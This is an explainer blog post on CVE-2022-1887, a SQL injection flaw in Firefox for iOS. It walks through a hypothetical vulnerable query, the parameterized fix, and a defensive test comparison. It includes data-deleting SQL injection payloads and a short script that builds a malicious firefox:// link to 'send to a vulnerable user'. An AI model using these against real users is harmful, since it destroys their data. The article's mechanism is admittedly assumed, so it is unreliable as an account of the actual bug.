In 2022, security researchers discovered a dangerous vulnerability in Firefox for iOS (versions prior to 101) that let attackers exploit search input to perform SQL injection—a technique that could let a hacker take control of your local data. Sounds wild? Let’s break down CVE-2022-1887 in simple terms, see how it happens, and why you should care.
What Is CVE-2022-1887?
CVE-2022-1887 is a security flaw found in Mozilla's Firefox for iOS – specifically in versions before 101. The bug allowed outside attackers to "inject" malicious SQL code via the search function, making it possible to manipulate the SQLite database used by the browser.
- Type: SQL Injection
- CVE Link: NVD - CVE-2022-1887
- Mozilla Advisory: MFSA 2022-23 #CVE-2022-1887
How Did the Bug Work?
The search feature in Firefox for iOS stored and queried recent searches using an embedded SQLite database. Normally, if you enter a search like “cat videos”, the app will securely insert that into the database.
But *before version 101*, Firefox did not sufficiently sanitize the search term. If an attacker crafted a search term containing SQL code, and somehow forced the app to process it (for example, via a crafted URL or link to an internal browser protocol), they could execute arbitrary SQL commands.
Let’s go step-by-step through a simplified attack scenario:
1. Attacker crafts a search term: Instead of searching "cat videos", the attacker uses something like "dogs'); DROP TABLE searchHistory; --" (an infamous classic for those who know SQL injection).
2. Browser receives search term and blindly inserts it into an SQL query.
3. Injected SQL executes: Instead of just searching, Firefox deletes the user's search history table!
Suppose Firefox for iOS used a snippet like this (in Swift with SQLite):
```swift
let searchTerm = userInputTextField.text! // Assume unsanitized input
// This is insecure: user input is inserted directly into the query string!
let query = "SELECT * FROM searchHistory WHERE term = '\(searchTerm)'"
let result = db.execute(query)
```
If a user input of
```
dogs'); DROP TABLE searchHistory; --
```
were supplied, it would translate to
```sql
SELECT * FROM searchHistory WHERE term = 'dogs'); DROP TABLE searchHistory; --'
```
The injected payload closes the string, ends the statement, and executes a command to drop (delete) the search history table!
Here’s what an attacker could use as the malicious search term:
```
a'; DELETE FROM searchHistory WHERE 1=1; --
```
If no input validation is in place, this would wipe out all search history entries.
Exploit Script Example (for Testing)
Important: _This is for educational testing only, do not use on live devices!_
```python
# Exploit for demonstration—send a custom search term via iOS URL scheme
import urllib.parse

# Malicious payload
payload = "a'; DELETE FROM searchHistory WHERE 1=1; --"

# Encode payload for URL
encoded = urllib.parse.quote(payload)

# Make a Firefox iOS search URL (assume it registers a URL protocol like firefox://search?q=)
exploit_url = f"firefox://search?q={encoded}"
print("Send this URL to a vulnerable user:")
print(exploit_url)
```
If a victim opens this link and their app does not sanitize input, their search database will be tampered with.
How Was It Fixed?
Mozilla patched this issue in Firefox for iOS 101, ensuring:
- Search terms are sanitized/escaped before being sent to the SQL engine.
- Parameterized queries are used, like so:
```swift
let query = "SELECT * FROM searchHistory WHERE term = ?"
let result = db.execute(query, [searchTerm])
```
This method safely binds the parameter so SQL code can no longer sneak in.
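The difference between the two query styles can be checked against a real SQLite engine. The following is an added example, not Mozilla's code and not part of the original article: it runs the article's hostile search term through an interpolated query and a bound query on an in-memory database. The `searchHistory` schema follows the article's hypothetical snippet, the function names are made up for illustration, and `executescript()` is assumed as a stand-in for an API that runs every statement it is handed.

```python
import sqlite3

# Constructed input: the hostile search term quoted in the article's walkthrough.
HOSTILE_TERM = "a'; DELETE FROM searchHistory WHERE 1=1; --"

def new_history_db():
    """In-memory stand-in for the browser's history store (schema is assumed)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE searchHistory (term TEXT NOT NULL)")
    db.executemany("INSERT INTO searchHistory (term) VALUES (?)",
                   [("cat videos",), ("dogs",)])
    db.commit()
    return db

def history_size(db):
    """Number of rows currently stored in searchHistory."""
    return db.execute("SELECT COUNT(*) FROM searchHistory").fetchone()[0]

def lookup_interpolated(db, term):
    """'Before' form: the term is pasted into the SQL text.
    executescript() models an API that runs every statement it receives."""
    try:
        db.executescript(f"SELECT * FROM searchHistory WHERE term = '{term}'")
    except sqlite3.Error:
        pass  # interpolation can also produce SQL that fails to parse
    return history_size(db)

def lookup_bound(db, term):
    """'After' form: the term travels as a bound value, never as SQL text."""
    rows = db.execute("SELECT term FROM searchHistory WHERE term = ?",
                      (term,)).fetchall()
    return rows, history_size(db)

def record_bound(db, term):
    """Bound INSERT: the hostile string is stored verbatim as ordinary data."""
    db.execute("INSERT INTO searchHistory (term) VALUES (?)", (term,))
    db.commit()
    return lookup_bound(db, term)

if __name__ == "__main__":
    print("interpolated, rows left:",
          lookup_interpolated(new_history_db(), HOSTILE_TERM))
    print("bound lookup:", lookup_bound(new_history_db(), HOSTILE_TERM))
    print("bound insert, then lookup:",
          record_bound(new_history_db(), HOSTILE_TERM))
```

With binding, the same string matches no rows on lookup and round-trips unchanged when stored, which makes these checks usable as regression tests for any code path that touches the history table.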
- Data privacy: Attackers could steal or delete your local data.
- App stability: SQL injection could corrupt your browser’s database, causing crashes or loss of data.
- Update Firefox for iOS: Make sure your app is 101 or later.
- Be wary of strange links: Don’t open weird links in apps, especially those that prompt in-app searches.
Final Word
CVE-2022-1887 is a classic example that even mobile browsers can have web-style vulnerabilities. Keeping your software up to date—and your code clean—is always your best defense. Stay safe!
Timeline
Published on: 12/22/2022 20:15:00 UTC
Last modified on: 12/24/2022 04:23:00 UTC